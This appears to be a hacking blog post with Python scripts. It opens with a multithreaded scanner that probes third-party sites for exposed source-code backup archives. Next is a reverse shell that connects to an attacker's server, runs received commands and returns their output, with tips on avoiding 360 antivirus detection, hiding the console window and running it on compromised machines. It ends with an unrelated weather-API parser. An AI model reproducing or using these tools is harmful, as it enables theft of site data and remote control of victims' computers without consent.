Many people have probably used the legendary 马蜂窝 digger (挖掘鸡). It was hugely popular back in the day as a tool for batch-scanning sites for leaked source-code archives, but most copies of it no longer work, so I wrote my own in Python just for fun.

First, save the URLs you have collected into a host.txt file in the script's directory, preferably as complete URLs.
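For example, host.txt might look like this (the domains are just placeholders; lines that don't start with "http" get "http://" prepended by the script):

http://www.example.com
https://demo.example.org
example.net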

While testing I ran into a problem: some sites have anti-crawler protection that silently redirects the request, so the script only reports a hit when the file it finds is larger than 1 MB.
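The idea in isolation looks roughly like this (a minimal sketch, not the exact code from the script below; check_url is just an illustrative name). urllib2 follows the redirect automatically, so the decoy page comes back as a small HTML document and gets filtered out by the size threshold:

import urllib2

def check_url(url):
    # The anti-crawler redirect still returns 200, but the decoy page is tiny;
    # only report the URL when Content-Length says the body is over 1 MB.
    response = urllib2.urlopen(url)
    size = response.info().getheader('Content-Length')
    response.close()
    if size and int(size) > 1024 * 1024:
        print url, '(%d KB)' % (int(size) / 1024)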

GitHub address: https://github.com/az0ne/digger

__author__ = 'AZONE'
import Queue
import urllib2
from threading import Thread
import sys
import httplib
import urlparse


def bThread(taget):
    # Spin up a pool of worker threads and feed them the target URLs.
    SETTHREAD = 800
    print '[Note] Running...\n'
    queue = Queue.Queue()
    hosts = taget
    for host in hosts:
        queue.put(host)

    threadl = [tThread(queue) for x in xrange(0, int(SETTHREAD))]
    for t in threadl:
        t.start()
    for t in threadl:
        t.join()


class tThread(Thread):
    # Worker thread: keeps pulling hosts off the queue until it is empty.

    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue

    def run(self):
        while not self.queue.empty():
            host = self.queue.get()
            try:
                requesturl(host)
            except Exception:
                continue


# Read the collected URLs from host.txt and normalize them to "http://.../".
taget = []
fd = open("host.txt", "r")
for line in fd.readlines():
    if line[0:4] == "http":
        taget.append(line.strip() + "/")
    else:
        taget.append("http://" + line.strip() + "/")
fd.close()
print taget
print "[Note] Thread:800"

# Common names for source-code backup archives left in the web root.
dirs = ["wwwroot.zip", "wwwroot.rar", "www.rar", "www.zip", "web.rar", "web.zip",
        "db.rar", "db.zip", "wz.rar", "wz.zip", "fdsa.rar", "fdsa.zip",
        "wangzhan.rar", "wangzhan.zip", "root.rar", "root.zip", "admin.rar",
        "admin.zip", "data.rar", "gg.rar", "vip.rar", "1.zip", "1.rar", "2.zip",
        "2.rar", "config.rar", "config.zip", "/config/config.rar", "/config/config.zip"]


def requesturl(taget):
    # Try every candidate archive name under the target URL.
    for d in dirs:
        TURL = taget + d
        request = urllib2.Request(TURL)
        try:
            response = urllib2.urlopen(request)
            back = response.read()
            response.close()
            # Re-request with httplib to read the Content-Length header and
            # only report files larger than 1 MB, which filters out the small
            # HTML pages returned by anti-crawler redirects.
            parsedurl = urlparse.urlparse(TURL)
            httpConn = httplib.HTTPConnection(parsedurl[1])
            httpConn.request('GET', parsedurl[2])
            responsed = httpConn.getresponse()
            if responsed.status == 200:
                size = responsed.getheader('Content-Length')
                size = int(size) / 1024
                if size > 1024:
                    print TURL + '\n'
                    print 'Size: %s KB' % size
        except urllib2.HTTPError:
            pass


bThread(taget)
sys.exit()
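With host.txt sitting next to the script, running it is just python digger.py (digger.py is an assumed filename, taken from the GitHub repo name); the thread count is hard-coded as SETTHREAD = 800.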

Next up is a simple reverse shell; 360 (antivirus) can be ignored, it doesn't flag it.

__author__ = 'AZONE'
import subprocess, socket

HOST = 'server ip'   # fill in your server's IP address here
PORT = 443

# Connect back to the listener and announce ourselves.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send('Hello !')

# Read commands, run them in a shell, and send back combined stdout/stderr.
while 1:
    data = s.recv(1024)
    if data == "quit":
        break
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    stdoutput = proc.stdout.read() + proc.stderr.read()
    s.send(stdoutput)

s.send('Bye !')
s.close()

Package it into an exe with pyinstaller: PyInstaller -F -w shell.py (-F builds a single file, -w hides the console window).

On the server, listen with NETCAT: netcat -l -p 443
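If netcat isn't available on the server, a listener can also be sketched in Python (my own sketch, not from the original post: it binds port 443, sends each typed command to the connected client, and prints the first 1024 bytes of every reply):

import socket

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(('0.0.0.0', 443))
listener.listen(1)
conn, addr = listener.accept()
print 'Connected from', addr
print conn.recv(1024)              # the client's 'Hello !' greeting
while True:
    cmd = raw_input('> ')
    conn.send(cmd)
    if cmd == 'quit':              # the client exits on "quit"
        break
    print conn.recv(1024)          # command output (truncated at 1024 bytes)
conn.close()
listener.close()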

Then have the compromised machine (肉鸡) run the exe you just built.

This last script calls the Baidu weather forecast API.

#coding=utf-8
import urllib
from xml.parsers.expat import ParserCreate
import sys


class ParserXML(object):
    # SAX-style handlers: just print every element, its attributes and text.

    def start_element(self, name, attrs):
        print('sax:start_element: %s, attrs: %s' % (name, str(attrs)))

    def end_element(self, name):
        print('sax:end_element: %s' % name)

    def char_data(self, text):
        print('sax:char_data: %s' % text)


# Read the city name from the console and re-encode it as UTF-8 for the URL.
city = raw_input()
city = city.decode(sys.stdin.encoding).encode('utf-8')
part1 = "http://api.map.baidu.com/telematics/v3/weather?location="
part2 = "&output=xml&ak=A95b994530a76ed90228f0cdbe1ef540"
url = part1 + city + part2
print url

# Fetch the XML response and feed it through the expat parser.
#xml = urllib.urlopen('http://api.map.baidu.com/telematics/v3/weather?location=哈尔滨&output=xml&ak=A95b994530a76ed90228f0cdbe1ef540').read()
xml = urllib.urlopen(url).read()
handler = ParserXML()
parser = ParserCreate()
parser.returns_unicode = True
parser.StartElementHandler = handler.start_element
parser.EndElementHandler = handler.end_element
parser.CharacterDataHandler = handler.char_data

parser.Parse(xml)
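If you only want the text values rather than a trace of SAX events, the same response could also be walked with ElementTree (a sketch that assumes the API returns well-formed XML; it simply dumps every element that carries text, whatever the schema looks like):

from xml.etree import ElementTree

def dump_weather_xml(xml_string):
    # Print a tag/text pair for every element that has non-empty text.
    root = ElementTree.fromstring(xml_string)
    for elem in root.iter():
        if elem.text and elem.text.strip():
            print '%s: %s' % (elem.tag, elem.text.strip())

# e.g. dump_weather_xml(xml) after the urlopen(...).read() call above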
